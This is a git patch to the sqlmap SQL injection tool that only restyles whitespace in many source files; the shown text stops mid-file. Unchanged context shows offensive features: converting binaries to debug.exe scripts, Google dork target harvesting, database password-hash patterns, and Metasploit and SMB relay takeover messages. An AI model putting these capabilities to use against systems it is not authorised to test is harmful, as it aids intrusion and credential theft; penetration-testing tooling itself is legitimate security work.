From f56d135438d85a749e355e213a6077c481fe74cf Mon Sep 17 00:00:00 2001 From: Bernardo Damele Date: Sat, 30 Apr 2011 13:20:05 +0000 Subject: [PATCH] Minor code restyling --- extra/chardet/mbcssm.py | 4 +- extra/cloak/cloak.py | 2 +- extra/dbgtool/dbgtool.py | 30 +-- extra/gprof2dot/gprof2dot.py | 4 +- extra/mssqlsig/update.py | 12 +- extra/safe2bin/safe2bin.py | 2 +- extra/sqlharvest/sqlharvest.py | 18 +- lib/controller/action.py | 2 +- lib/controller/checks.py | 2 +- lib/controller/controller.py | 14 +- lib/controller/handler.py | 6 +- lib/core/common.py | 6 +- lib/core/dicts.py | 6 +- lib/core/dump.py | 22 +- lib/core/enums.py | 130 +++++------ lib/core/option.py | 294 ++++++++++++------------ lib/core/profiling.py | 2 +- lib/core/replication.py | 8 +- lib/core/session.py | 12 +- lib/core/settings.py | 94 ++++---- lib/core/subprocessng.py | 2 +- lib/core/target.py | 10 +- lib/core/testing.py | 8 +- lib/core/threads.py | 16 +- lib/core/xmldump.py | 6 +- lib/parse/banner.py | 18 +- lib/parse/cmdline.py | 2 +- lib/parse/configfile.py | 6 +- lib/parse/handler.py | 16 +- lib/parse/headers.py | 2 +- lib/parse/html.py | 8 +- lib/request/basic.py | 4 +- lib/request/connect.py | 74 +++--- lib/request/direct.py | 2 +- lib/request/proxy.py | 4 +- lib/request/redirecthandler.py | 6 +- lib/takeover/abstraction.py | 14 +- lib/takeover/icmpsh.py | 14 +- lib/takeover/metasploit.py | 80 +++---- lib/takeover/registry.py | 20 +- lib/takeover/udf.py | 58 ++--- lib/takeover/web.py | 28 +-- lib/takeover/xp_cmdshell.py | 16 +- lib/techniques/blind/inference.py | 14 +- lib/techniques/error/use.py | 2 +- lib/techniques/inband/union/use.py | 2 +- lib/utils/google.py | 8 +- lib/utils/hash.py | 4 +- lib/utils/resume.py | 24 +- plugins/dbms/access/connector.py | 2 +- plugins/dbms/access/fingerprint.py | 6 +- plugins/dbms/access/takeover.py | 4 +- plugins/dbms/firebird/fingerprint.py | 8 +- plugins/dbms/firebird/takeover.py | 4 +- plugins/dbms/maxdb/connector.py | 2 +- plugins/dbms/maxdb/fingerprint.py | 14 +- plugins/dbms/maxdb/takeover.py | 4 +- plugins/dbms/mssqlserver/enumeration.py | 6 +- plugins/dbms/mssqlserver/filesystem.py | 26 +-- plugins/dbms/mssqlserver/fingerprint.py | 2 +- plugins/dbms/mssqlserver/takeover.py | 6 +- plugins/dbms/mysql/__init__.py | 12 +- plugins/dbms/mysql/filesystem.py | 18 +- plugins/dbms/mysql/fingerprint.py | 4 +- plugins/dbms/mysql/syntax.py | 2 +- plugins/dbms/mysql/takeover.py | 4 +- plugins/dbms/oracle/enumeration.py | 14 +- plugins/dbms/oracle/filesystem.py | 4 +- plugins/dbms/oracle/fingerprint.py | 8 +- plugins/dbms/oracle/takeover.py | 8 +- plugins/dbms/postgresql/__init__.py | 14 +- plugins/dbms/postgresql/filesystem.py | 16 +- plugins/dbms/postgresql/fingerprint.py | 10 +- plugins/dbms/sqlite/connector.py | 2 +- plugins/dbms/sqlite/fingerprint.py | 4 +- plugins/dbms/sqlite/takeover.py | 4 +- plugins/dbms/sybase/enumeration.py | 2 +- plugins/dbms/sybase/fingerprint.py | 4 +- plugins/dbms/sybase/takeover.py | 4 +- plugins/generic/connector.py | 8 +- plugins/generic/enumeration.py | 116 +++++----- plugins/generic/filesystem.py | 50 ++-- plugins/generic/fingerprint.py | 6 +- plugins/generic/misc.py | 4 +- plugins/generic/syntax.py | 4 +- plugins/generic/takeover.py | 64 +++--- 86 files changed, 804 insertions(+), 804 deletions(-) diff --git a/extra/chardet/mbcssm.py b/extra/chardet/mbcssm.py index e46c1ffeb..2b68306b0 100755 --- a/extra/chardet/mbcssm.py +++ b/extra/chardet/mbcssm.py @@ -129,7 +129,7 @@ EUCJPSMModel = {'classTable': EUCJP_cls, # EUC-KR -EUCKR_cls = ( \ +EUCKR_cls = ( \ 1,1,1,1,1,1,1,1, # 00 - 07 1,1,1,1,1,1,0,0, # 08 - 0f 1,1,1,1,1,1,1,1, # 10 - 17 @@ -371,7 +371,7 @@ UCS2BE_cls = ( \ 0,0,0,0,0,0,0,0, # f0 - f7 0,0,0,0,0,0,4,5) # f8 - ff -UCS2BE_st = ( \ +UCS2BE_st = ( \ 5, 7, 7,eError, 4, 3,eError,eError,#00-07 eError,eError,eError,eError,eItsMe,eItsMe,eItsMe,eItsMe,#08-0f eItsMe,eItsMe, 6, 6, 6, 6,eError,eError,#10-17 diff --git a/extra/cloak/cloak.py b/extra/cloak/cloak.py index 26b436772..051b28113 100755 --- a/extra/cloak/cloak.py +++ b/extra/cloak/cloak.py @@ -47,7 +47,7 @@ def decloak(inputFile): def main(): usage = '%s [-d] -i [-o ]' % sys.argv[0] - parser = OptionParser(usage=usage, version='0.1') + parser = OptionParser(usage=usage, version='0.1') try: parser.add_option('-d', dest='decrypt', action="store_true", help='Decrypt') diff --git a/extra/dbgtool/dbgtool.py b/extra/dbgtool/dbgtool.py index b360b1dd5..759de2bda 100755 --- a/extra/dbgtool/dbgtool.py +++ b/extra/dbgtool/dbgtool.py @@ -24,13 +24,13 @@ def convert(inputFile): print "ERROR: the provided input file '%s' is too big for debug.exe" % inputFile sys.exit(1) - script = "n %s\nr cx\n" % os.path.basename(inputFile.replace(".", "_")) - script += "%x\nf 0100 ffff 00\n" % fileSize - scrString = "" - counter = 256 - counter2 = 0 + script = "n %s\nr cx\n" % os.path.basename(inputFile.replace(".", "_")) + script += "%x\nf 0100 ffff 00\n" % fileSize + scrString = "" + counter = 256 + counter2 = 0 - fp = open(inputFile, "rb") + fp = open(inputFile, "rb") fileContent = fp.read() for fileChar in fileContent: @@ -40,20 +40,20 @@ def convert(inputFile): counter2 += 1 if not scrString: - scrString = "e %0x %02x" % (counter, unsignedFileChar) + scrString = "e %0x %02x" % (counter, unsignedFileChar) else: scrString += " %02x" % unsignedFileChar elif scrString: - script += "%s\n" % scrString + script += "%s\n" % scrString scrString = "" - counter2 = 0 + counter2 = 0 counter += 1 if counter2 == 20: - script += "%s\n" % scrString - scrString = "" - counter2 = 0 + script += "%s\n" % scrString + scrString = "" + counter2 = 0 script += "w\nq\n" @@ -67,7 +67,7 @@ def main(inputFile, outputFile): script = convert(inputFile) if outputFile: - fpOut = open(outputFile, "w") + fpOut = open(outputFile, "w") sys.stdout = fpOut sys.stdout.write(script) sys.stdout.close() @@ -76,7 +76,7 @@ def main(inputFile, outputFile): if __name__ == "__main__": usage = "%s -i [-o ]" % sys.argv[0] - parser = OptionParser(usage=usage, version="0.1") + parser = OptionParser(usage=usage, version="0.1") try: parser.add_option("-i", dest="inputFile", help="Input binary file") @@ -91,7 +91,7 @@ if __name__ == "__main__": except (OptionError, TypeError), e: parser.error(e) - inputFile = args.inputFile + inputFile = args.inputFile outputFile = args.outputFile main(inputFile, outputFile) diff --git a/extra/gprof2dot/gprof2dot.py b/extra/gprof2dot/gprof2dot.py index 8978b8e93..49cdcfe7c 100755 --- a/extra/gprof2dot/gprof2dot.py +++ b/extra/gprof2dot/gprof2dot.py @@ -657,8 +657,8 @@ class XmlTokenizer: self.character_data = '' self.parser = xml.parsers.expat.ParserCreate() - self.parser.StartElementHandler = self.handle_element_start - self.parser.EndElementHandler = self.handle_element_end + self.parser.StartElementHandler = self.handle_element_start + self.parser.EndElementHandler = self.handle_element_end self.parser.CharacterDataHandler = self.handle_character_data def handle_element_start(self, name, attributes): diff --git a/extra/mssqlsig/update.py b/extra/mssqlsig/update.py index 24fb4073b..071561abe 100644 --- a/extra/mssqlsig/update.py +++ b/extra/mssqlsig/update.py @@ -38,16 +38,16 @@ def updateMSSQLXML(): mssqlVersionsHtmlString = f.read() f.close() except urllib2.URLError: - __mssqlPath = urlparse.urlsplit(MSSQL_VERSIONS_URL) + __mssqlPath = urlparse.urlsplit(MSSQL_VERSIONS_URL) __mssqlHostname = __mssqlPath[1] - warnMsg = "[WARNING] sqlmap was unable to connect to %s," % __mssqlHostname + warnMsg = "[WARNING] sqlmap was unable to connect to %s," % __mssqlHostname warnMsg += " check your Internet connection and retry" print warnMsg return - releases = re.findall("class=\"BCC_DV_01DarkBlueTitle\">SQL Server ([\d\.]+) Builds", mssqlVersionsHtmlString, re.I | re.M) + releases = re.findall("class=\"BCC_DV_01DarkBlueTitle\">SQL Server ([\d\.]+) Builds", mssqlVersionsHtmlString, re.I | re.M) releasesCount = len(releases) # Create the minidom document @@ -73,9 +73,9 @@ def updateMSSQLXML(): startIdx = mssqlVersionsHtmlString.index("SQL Server %s Builds" % releases[index]) if index == releasesCount - 1: - stopIdx = len(mssqlVersionsHtmlString) + stopIdx = len(mssqlVersionsHtmlString) else: - stopIdx = mssqlVersionsHtmlString.index("SQL Server %s Builds" % releases[index + 1]) + stopIdx = mssqlVersionsHtmlString.index("SQL Server %s Builds" % releases[index + 1]) mssqlVersionsReleaseString = mssqlVersionsHtmlString[startIdx:stopIdx] servicepackVersion = re.findall("[7\.0|2000|2005|2008]*(.*?)[\r]*\n", mssqlVersionsReleaseString, re.I | re.M) @@ -133,7 +133,7 @@ def updateMSSQLXML(): doc.writexml(writer=mssqlXml, addindent=" ", newl="\n") mssqlXml.close() - infoMsg = "[INFO] done. retrieved data parsed and saved into '%s'" % MSSQL_XML + infoMsg = "[INFO] done. retrieved data parsed and saved into '%s'" % MSSQL_XML print infoMsg if __name__ == "__main__": diff --git a/extra/safe2bin/safe2bin.py b/extra/safe2bin/safe2bin.py index 7fb8d79fe..a9aea2be5 100755 --- a/extra/safe2bin/safe2bin.py +++ b/extra/safe2bin/safe2bin.py @@ -75,7 +75,7 @@ def safechardecode(value): def main(): usage = '%s -i [-o ]' % sys.argv[0] - parser = OptionParser(usage=usage, version='0.1') + parser = OptionParser(usage=usage, version='0.1') try: parser.add_option('-i', dest='inputFile', help='Input file') diff --git a/extra/sqlharvest/sqlharvest.py b/extra/sqlharvest/sqlharvest.py index d21b4bc9d..3c4fb246d 100644 --- a/extra/sqlharvest/sqlharvest.py +++ b/extra/sqlharvest/sqlharvest.py @@ -19,15 +19,15 @@ from operator import itemgetter def main(): - TIMEOUT = 10 - CONFIG_FILE = 'sqlharvest.cfg' - TABLES_FILE = 'tables.txt' - USER_AGENT = 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; AskTB5.3)' - SEARCH_URL = 'http://www.google.com/m?source=mobileproducts&dc=gorganic' - MAX_FILE_SIZE = 2*1024*1024 # if a result (.sql) file for downloading is more than 2MB in size just skip it - QUERY = 'CREATE TABLE ext:sql' - REGEX_URLS = r';u=([^"]+)' - REGEX_RESULT = r'CREATE TABLE\s*(/\*.*\*/)?\s*(IF NOT EXISTS)?\s*(?P[^\(;]+)' + TIMEOUT = 10 + CONFIG_FILE = 'sqlharvest.cfg' + TABLES_FILE = 'tables.txt' + USER_AGENT = 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; AskTB5.3)' + SEARCH_URL = 'http://www.google.com/m?source=mobileproducts&dc=gorganic' + MAX_FILE_SIZE = 2*1024*1024 # if a result (.sql) file for downloading is more than 2MB in size just skip it + QUERY = 'CREATE TABLE ext:sql' + REGEX_URLS = r';u=([^"]+)' + REGEX_RESULT = r'CREATE TABLE\s*(/\*.*\*/)?\s*(IF NOT EXISTS)?\s*(?P[^\(;]+)' tables = dict() refiles = re.compile(REGEX_URLS) diff --git a/lib/controller/action.py b/lib/controller/action.py index 47ee79c8b..140c57289 100644 --- a/lib/controller/action.py +++ b/lib/controller/action.py @@ -34,7 +34,7 @@ def action(): if not Backend.getDbms() or not conf.dbmsHandler: htmlParsed = Format.getErrorParsedDBMSes() - errMsg = "sqlmap was not able to fingerprint the " + errMsg = "sqlmap was not able to fingerprint the " errMsg += "back-end database management system" if htmlParsed: diff --git a/lib/controller/checks.py b/lib/controller/checks.py index dd788502c..3a3398af3 100644 --- a/lib/controller/checks.py +++ b/lib/controller/checks.py @@ -356,7 +356,7 @@ def checkSqlInjection(place, parameter, value): injectable = True except sqlmapConnectionException, msg: - debugMsg = "problem occured most likely because the " + debugMsg = "problem occured most likely because the " debugMsg += "server hasn't recovered as expected from the " debugMsg += "error-based payload used ('%s')" % msg logger.debug(debugMsg) diff --git a/lib/controller/controller.py b/lib/controller/controller.py index 0ff6f7a73..22e93a10f 100644 --- a/lib/controller/controller.py +++ b/lib/controller/controller.py @@ -174,7 +174,7 @@ def start(): kb.targetUrls.add(( conf.url, conf.method, conf.data, conf.cookie )) if conf.configFile and not kb.targetUrls: - errMsg = "you did not edit the configuration file properly, set " + errMsg = "you did not edit the configuration file properly, set " errMsg += "the target url, list of targets or google dork" logger.error(errMsg) return False @@ -183,15 +183,15 @@ def start(): infoMsg = "sqlmap got a total of %d targets" % len(kb.targetUrls) logger.info(infoMsg) - hostCount = 0 - cookieStr = "" + hostCount = 0 + cookieStr = "" setCookieAsInjectable = True for targetUrl, targetMethod, targetData, targetCookie in kb.targetUrls: try: - conf.url = targetUrl + conf.url = targetUrl conf.method = targetMethod - conf.data = targetData + conf.data = targetData conf.cookie = targetCookie initTargetEnv() @@ -289,7 +289,7 @@ def start(): if not conf.dropSetCookie and conf.cj: for _, cookie in enumerate(conf.cj): cookie = getUnicode(cookie) - index = cookie.index(" for ") + index = cookie.index(" for ") cookieStr += "%s;" % cookie[8:index] @@ -297,7 +297,7 @@ def start(): cookieStr = cookieStr[:-1] if PLACE.COOKIE in conf.parameters: - message = "you provided an HTTP Cookie header value. " + message = "you provided an HTTP Cookie header value. " message += "The target url provided its own Cookie within " message += "the HTTP Set-Cookie header. Do you want to " message += "continue using the HTTP Cookie values that " diff --git a/lib/controller/handler.py b/lib/controller/handler.py index ec31bbfd1..7b21df61b 100644 --- a/lib/controller/handler.py +++ b/lib/controller/handler.py @@ -49,9 +49,9 @@ def setHandler(): management system. """ - count = 0 + count = 0 dbmsNames = ( "MySQL", "Oracle", "PostgreSQL", "Microsoft SQL Server", "SQLite", "Microsoft Access", "Firebird", "SAP MaxDB", "Sybase" ) - dbmsObj = [ + dbmsObj = [ ( MYSQL_ALIASES, MySQLMap, MySQLConn ), ( ORACLE_ALIASES, OracleMap, OracleConn ), ( PGSQL_ALIASES, PostgreSQLMap, PostgreSQLConn ), @@ -77,7 +77,7 @@ def setHandler(): for dbmsAliases, dbmsMap, dbmsConn in dbmsObj: if conf.dbms and conf.dbms not in dbmsAliases: - debugMsg = "skipping test for %s" % dbmsNames[count] + debugMsg = "skipping test for %s" % dbmsNames[count] logger.debug(debugMsg) count += 1 diff --git a/lib/core/common.py b/lib/core/common.py index 8dc218987..f1eb3cc01 100644 --- a/lib/core/common.py +++ b/lib/core/common.py @@ -646,7 +646,7 @@ def dataToStdout(data, forceOutput=False): output = data.encode('ascii', errors="replace") if output != data: - warnMsg = "cannot properly display Unicode characters " + warnMsg = "cannot properly display Unicode characters " warnMsg += "inside Windows OS command prompt " warnMsg += "(http://bugs.python.org/issue1602). All " warnMsg += "similar occurances will result in " @@ -1891,7 +1891,7 @@ def adjustTimeDelay(lastQueryDuration, lowerStdLimit): if all([x == candidate for x in kb.delayCandidates]) and candidate < conf.timeSec: print - warnMsg = "adjusting time delay to %d second%s " % (candidate, 's' if candidate > 1 else '') + warnMsg = "adjusting time delay to %d second%s " % (candidate, 's' if candidate > 1 else '') warnMsg += "(due to good response times)" logger.warn(warnMsg) @@ -2402,7 +2402,7 @@ def unhandledExceptionMessage(): Returns detailed message about occured unhandled exception """ - errMsg = "unhandled exception in %s, retry your " % VERSION_STRING + errMsg = "unhandled exception in %s, retry your " % VERSION_STRING errMsg += "run with the latest development version from the Subversion " errMsg += "repository. If the exception persists, please send by e-mail " errMsg += "to %s the following text " % ML diff --git a/lib/core/dicts.py b/lib/core/dicts.py index 798a78f7b..4582911f0 100644 --- a/lib/core/dicts.py +++ b/lib/core/dicts.py @@ -24,7 +24,7 @@ firebirdTypes = { "37":"VARCHAR" } -sybaseTypes = { +sybaseTypes = { "14":"floatn", "8":"float", "15":"datetimn", @@ -55,7 +55,7 @@ sybaseTypes = { "20":"image", } -mysqlPrivs = { +mysqlPrivs = { 1:"select_priv", 2:"insert_priv", 3:"update_priv", @@ -84,7 +84,7 @@ mysqlPrivs = { 26:"create_user_priv", } -pgsqlPrivs = { +pgsqlPrivs = { 1:"createdb", 2:"super", 3:"catupd", diff --git a/lib/core/dump.py b/lib/core/dump.py index 366997000..4dc659811 100644 --- a/lib/core/dump.py +++ b/lib/core/dump.py @@ -34,7 +34,7 @@ class Dump: def __init__(self): self.__outputFile = None - self.__outputFP = None + self.__outputFP = None def __write(self, data, n=True): text = "%s%s" % (data, "\n" if n else " ") @@ -300,7 +300,7 @@ class Dump: def dbTableValues(self, tableValues): replication = None - rtable = None + rtable = None if tableValues is None: return @@ -321,18 +321,18 @@ class Dump: dumpFileName = "%s%s%s.csv" % (dumpDbPath, os.sep, table) dumpFP = openFile(dumpFileName, "wb") - count = int(tableValues["__infos__"]["count"]) - separator = str() - field = 1 - fields = len(tableValues) - 1 + count = int(tableValues["__infos__"]["count"]) + separator = str() + field = 1 + fields = len(tableValues) - 1 columns = tableValues.keys() columns.sort(key=lambda x: x.lower() if isinstance(x, basestring) else x) for column in columns: if column != "__infos__": - info = tableValues[column] - lines = "-" * (int(info["length"]) + 2) + info = tableValues[column] + lines = "-" * (int(info["length"]) + 2) separator += "+%s" % lines separator += "+" @@ -381,9 +381,9 @@ class Dump: for column in columns: if column != "__infos__": - info = tableValues[column] + info = tableValues[column] maxlength = int(info["length"]) - blank = " " * (maxlength - len(column)) + blank = " " * (maxlength - len(column)) self.__write("| %s%s" % (column, blank), n=False) @@ -458,7 +458,7 @@ class Dump: else: colConsiderStr = " '%s' was" % column - msg = "Column%s found in the " % colConsiderStr + msg = "Column%s found in the " % colConsiderStr msg += "following databases:" self.__write(msg) diff --git a/lib/core/enums.py b/lib/core/enums.py index 44e10138a..fbc5fcb06 100644 --- a/lib/core/enums.py +++ b/lib/core/enums.py @@ -8,94 +8,94 @@ See the file 'doc/COPYING' for copying permission """ class PRIORITY: - LOWEST = -100 - LOWER = -50 - LOW = -10 - NORMAL = 0 - HIGH = 10 - HIGHER = 50 + LOWEST = -100 + LOWER = -50 + LOW = -10 + NORMAL = 0 + HIGH = 10 + HIGHER = 50 HIGHEST = 100 class SORTORDER: - FIRST = 0 - SECOND = 1 - THIRD = 2 - FOURTH = 3 - FIFTH = 4 - LAST = 100 + FIRST = 0 + SECOND = 1 + THIRD = 2 + FOURTH = 3 + FIFTH = 4 + LAST = 100 class DBMS: - ACCESS = "Microsoft Access" + ACCESS = "Microsoft Access" FIREBIRD = "Firebird" - MAXDB = "SAP MaxDB" - MSSQL = "Microsoft SQL Server" - MYSQL = "MySQL" - ORACLE = "Oracle" - PGSQL = "PostgreSQL" - SQLITE = "SQLite" - SYBASE = "Sybase" + MAXDB = "SAP MaxDB" + MSSQL = "Microsoft SQL Server" + MYSQL = "MySQL" + ORACLE = "Oracle" + PGSQL = "PostgreSQL" + SQLITE = "SQLite" + SYBASE = "Sybase" class OS: - LINUX = "Linux" + LINUX = "Linux" WINDOWS = "Windows" class PLACE: - GET = "GET" - POST = "POST" - SOAP = "SOAP" - URI = "URI" - COOKIE = "Cookie" - UA = "User-Agent" + GET = "GET" + POST = "POST" + SOAP = "SOAP" + URI = "URI" + COOKIE = "Cookie" + UA = "User-Agent" REFERER = "Referer" class HTTPMETHOD: - GET = "GET" - POST = "POST" - HEAD = "HEAD" + GET = "GET" + POST = "POST" + HEAD = "HEAD" class NULLCONNECTION: - HEAD = "HEAD" - RANGE = "Range" + HEAD = "HEAD" + RANGE = "Range" class HASH: - MYSQL = r'(?i)\A\*[0-9a-f]{40}\Z' - MYSQL_OLD = r'(?i)\A[0-9a-f]{16}\Z' - POSTGRES = r'(?i)\Amd5[0-9a-f]{32}\Z' - MSSQL = r'(?i)\A0x0100[0-9a-f]{8}[0-9a-f]{40}\Z' - MSSQL_OLD = r'(?i)\A0x0100[0-9a-f]{8}[0-9a-f]{80}\Z' - ORACLE = r'(?i)\As:[0-9a-f]{60}\Z' - ORACLE_OLD = r'(?i)\A[01-9a-f]{16}\Z' - MD5_GENERIC = r'(?i)\A[0-9a-f]{32}\Z' - SHA1_GENERIC = r'(?i)\A[0-9a-f]{40}\Z' + MYSQL = r'(?i)\A\*[0-9a-f]{40}\Z' + MYSQL_OLD = r'(?i)\A[0-9a-f]{16}\Z' + POSTGRES = r'(?i)\Amd5[0-9a-f]{32}\Z' + MSSQL = r'(?i)\A0x0100[0-9a-f]{8}[0-9a-f]{40}\Z' + MSSQL_OLD = r'(?i)\A0x0100[0-9a-f]{8}[0-9a-f]{80}\Z' + ORACLE = r'(?i)\As:[0-9a-f]{60}\Z' + ORACLE_OLD = r'(?i)\A[01-9a-f]{16}\Z' + MD5_GENERIC = r'(?i)\A[0-9a-f]{32}\Z' + SHA1_GENERIC = r'(?i)\A[0-9a-f]{40}\Z' CRYPT_GENERIC = r'(?i)\A[./0-9A-Za-z]{13}\Z' # Reference: http://www.zytrax.com/tech/web/mobile_ids.html class MOBILES: - BLACKBERRY = "RIM Blackberry 9800 Torch;Mozilla/5.0 (BlackBerry; U; BlackBerry 9800; en-US) AppleWebKit/534.1+ (KHTML, like Gecko) Version/6.0.0.246 Mobile Safari/534.1+" - GALAXY = "Samsung Galaxy S;Mozilla/5.0 (Linux; U; Android 2.2; en-US; SGH-T959D Build/FROYO) AppleWebKit/533.1 (KHTML, like Gecko) Version/4.0 Mobile Safari/533.1" - HP = "HP iPAQ 6365;Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; PPC; 240x320; HP iPAQ h6300)" - HTC = "HTC Evo;Mozilla/5.0 (Linux; U; Android 2.2; en-us; Sprint APA9292KT Build/FRF91) AppleWebKit/533.1 (KHTML, like Gecko) Version/4.0 Mobile Safari/533.1" - IPHONE = "Apple iPhone 4;Mozilla/5.0 (iPhone; U; CPU iPhone OS 4_0 like Mac OS X; en-us) AppleWebKit/532.9 (KHTML, like Gecko) Version/4.0.5 Mobile/8A293 Safari/531.22.7" - NEXUS = "Google Nexus One;Mozilla/5.0 (Linux; U; Android 2.2; en-US; Nexus One Build/FRF91) AppleWebKit/533.1 (KHTML, like Gecko) Version/4.0 Mobile Safari/533.1" - NOKIA = "Nokia N97;Mozilla/5.0 (SymbianOS/9.4; Series60/5.0 NokiaN97-1/10.0.012; Profile/MIDP-2.1 Configuration/CLDC-1.1; en-us) AppleWebKit/525 (KHTML, like Gecko) WicKed/7.1.12344" + BLACKBERRY = "RIM Blackberry 9800 Torch;Mozilla/5.0 (BlackBerry; U; BlackBerry 9800; en-US) AppleWebKit/534.1+ (KHTML, like Gecko) Version/6.0.0.246 Mobile Safari/534.1+" + GALAXY = "Samsung Galaxy S;Mozilla/5.0 (Linux; U; Android 2.2; en-US; SGH-T959D Build/FROYO) AppleWebKit/533.1 (KHTML, like Gecko) Version/4.0 Mobile Safari/533.1" + HP = "HP iPAQ 6365;Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; PPC; 240x320; HP iPAQ h6300)" + HTC = "HTC Evo;Mozilla/5.0 (Linux; U; Android 2.2; en-us; Sprint APA9292KT Build/FRF91) AppleWebKit/533.1 (KHTML, like Gecko) Version/4.0 Mobile Safari/533.1" + IPHONE = "Apple iPhone 4;Mozilla/5.0 (iPhone; U; CPU iPhone OS 4_0 like Mac OS X; en-us) AppleWebKit/532.9 (KHTML, like Gecko) Version/4.0.5 Mobile/8A293 Safari/531.22.7" + NEXUS = "Google Nexus One;Mozilla/5.0 (Linux; U; Android 2.2; en-US; Nexus One Build/FRF91) AppleWebKit/533.1 (KHTML, like Gecko) Version/4.0 Mobile Safari/533.1" + NOKIA = "Nokia N97;Mozilla/5.0 (SymbianOS/9.4; Series60/5.0 NokiaN97-1/10.0.012; Profile/MIDP-2.1 Configuration/CLDC-1.1; en-us) AppleWebKit/525 (KHTML, like Gecko) WicKed/7.1.12344" class HTTPHEADER: - ACCEPT_ENCODING = "Accept-Encoding" - AUTHORIZATION = "Authorization" - CONNECTION = "Connection" - CONTENT_ENCODING = "Content-Encoding" - CONTENT_LENGTH = "Content-Length" - CONTENT_RANGE = "Content-Range" - CONTENT_TYPE = "Content-Type" - COOKIE = "Cookie" + ACCEPT_ENCODING = "Accept-Encoding" + AUTHORIZATION = "Authorization" + CONNECTION = "Connection" + CONTENT_ENCODING = "Content-Encoding" + CONTENT_LENGTH = "Content-Length" + CONTENT_RANGE = "Content-Range" + CONTENT_TYPE = "Content-Type" + COOKIE = "Cookie" PROXY_AUTHORIZATION = "Proxy-authorization" - RANGE = "Range" - REFERER = "Referer" - USER_AGENT = "User-Agent" + RANGE = "Range" + REFERER = "Referer" + USER_AGENT = "User-Agent" class EXPECTED: - BOOL = "bool" - INT = "int" + BOOL = "bool" + INT = "int" class PAYLOAD: SQLINJECTION = { @@ -134,10 +134,10 @@ class PAYLOAD: } class METHOD: - COMPARISON = "comparison" - GREP = "grep" - TIME = "time" - UNION = "union" + COMPARISON = "comparison" + GREP = "grep" + TIME = "time" + UNION = "union" class TECHNIQUE: BOOLEAN = 1 diff --git a/lib/core/option.py b/lib/core/option.py index 831508ba0..b73dcaafd 100644 --- a/lib/core/option.py +++ b/lib/core/option.py @@ -163,7 +163,7 @@ def __feedTargetsDict(reqFile, addedTargetUrls): getPostReq = False for request in reqResList: - url = extractRegexResult(r"URL: (?P.+?)\n", request, re.I) + url = extractRegexResult(r"URL: (?P.+?)\n", request, re.I) method = extractRegexResult(r"METHOD: (?P.+?)\n", request, re.I) cookie = extractRegexResult(r"COOKIE: (?P.+?)\n", request, re.I) getPostReq = True @@ -191,7 +191,7 @@ def __feedTargetsDict(reqFile, addedTargetUrls): """ Parses burp logs """ - port = None + port = None scheme = None reqResList = content.split(BURP_SPLITTER) @@ -202,7 +202,7 @@ def __feedTargetsDict(reqFile, addedTargetUrls): if schemePort: scheme = schemePort.group(1) - port = schemePort.group(2) + port = schemePort.group(2) if not re.search ("^[\n]*(GET|POST).*?\sHTTP\/", request, re.I): continue @@ -211,13 +211,13 @@ def __feedTargetsDict(reqFile, addedTargetUrls): continue getPostReq = False - url = None - host = None - method = None - data = None - cookie = None - params = False - lines = request.split("\n") + url = None + host = None + method = None + data = None + cookie = None + params = False + lines = request.split("\n") for line in lines: if len(line) == 0 or line == "\n": @@ -283,9 +283,9 @@ def __feedTargetsDict(reqFile, addedTargetUrls): scheme = "https" if not url.startswith("http"): - url = "%s://%s:%s%s" % (scheme or "http", host, port or "80", url) + url = "%s://%s:%s%s" % (scheme or "http", host, port or "80", url) scheme = None - port = None + port = None if not kb.targetUrls or url not in addedTargetUrls: kb.targetUrls.add((url, method, urldecode(data), cookie)) @@ -343,14 +343,14 @@ def __setMultipleTargets(): __feedTargetsDict(os.path.join(conf.list, reqFile), addedTargetUrls) else: - errMsg = "the specified list of targets is not a file " + errMsg = "the specified list of targets is not a file " errMsg += "nor a directory" raise sqlmapFilePathException, errMsg updatedTargetsCount = len(kb.targetUrls) if updatedTargetsCount > initialTargetsCount: - infoMsg = "sqlmap parsed %d " % (updatedTargetsCount - initialTargetsCount) + infoMsg = "sqlmap parsed %d " % (updatedTargetsCount - initialTargetsCount) infoMsg += "testable requests from the targets list" logger.info(infoMsg) @@ -371,7 +371,7 @@ def __setRequestFromFile(): logger.info(infoMsg) if not os.path.isfile(conf.requestFile): - errMsg = "the specified HTTP request file " + errMsg = "the specified HTTP request file " errMsg += "does not exist" raise sqlmapFilePathException, errMsg @@ -414,14 +414,14 @@ def __setGoogleDorking(): matches = googleObj.search(conf.googleDork) if not matches: - errMsg = "unable to find results for your " + errMsg = "unable to find results for your " errMsg += "Google dork expression" raise sqlmapGenericException, errMsg googleObj.getTargetUrls() if kb.targetUrls: - logMsg = "sqlmap got %d results for your " % len(matches) + logMsg = "sqlmap got %d results for your " % len(matches) logMsg += "Google dork expression, " if len(matches) == len(kb.targetUrls): @@ -432,7 +432,7 @@ def __setGoogleDorking(): logMsg += "of them are testable targets" logger.info(logMsg) else: - errMsg = "sqlmap got %d results " % len(matches) + errMsg = "sqlmap got %d results " % len(matches) errMsg += "for your Google dork expression, but none of them " errMsg += "have GET parameters to test for SQL injection" raise sqlmapGenericException, errMsg @@ -450,7 +450,7 @@ def __findPageForms(): response, _ = Request.queryPage(response=True) if response is None or isinstance(response, basestring): - errMsg = "can't do form parsing as no valid response " + errMsg = "can't do form parsing as no valid response " errMsg += "object found. please check previous log messages " errMsg += "for connection issues" raise sqlmapGenericException, errMsg @@ -458,7 +458,7 @@ def __findPageForms(): try: forms = ParseResponse(response, backwards_compat=False) except ParseError: - errMsg = "badly formed HTML at the target url. can't parse forms" + errMsg = "badly formed HTML at the target url. can't parse forms" raise sqlmapGenericException, errMsg if forms: @@ -478,7 +478,7 @@ def __findPageForms(): kb.targetUrls.add(target) kb.formNames.append(target) else: - errMsg = "there were no forms found at the given target url" + errMsg = "there were no forms found at the given target url" raise sqlmapGenericException, errMsg def __setMetasploit(): @@ -491,7 +491,7 @@ def __setMetasploit(): msfEnvPathExists = False if IS_WIN: - warnMsg = "some sqlmap takeover functionalities are not yet " + warnMsg = "some sqlmap takeover functionalities are not yet " warnMsg += "supported on Windows. Please use Linux in a virtual " warnMsg += "machine for out-of-band features." @@ -503,7 +503,7 @@ def __setMetasploit(): isAdmin = runningAsAdmin() if isAdmin is not True: - errMsg = "you need to run sqlmap as an administrator " + errMsg = "you need to run sqlmap as an administrator " errMsg += "if you want to perform a SMB relay attack because " errMsg += "it will need to listen on a user-specified SMB " errMsg += "TCP port for incoming connection attempts" @@ -513,7 +513,7 @@ def 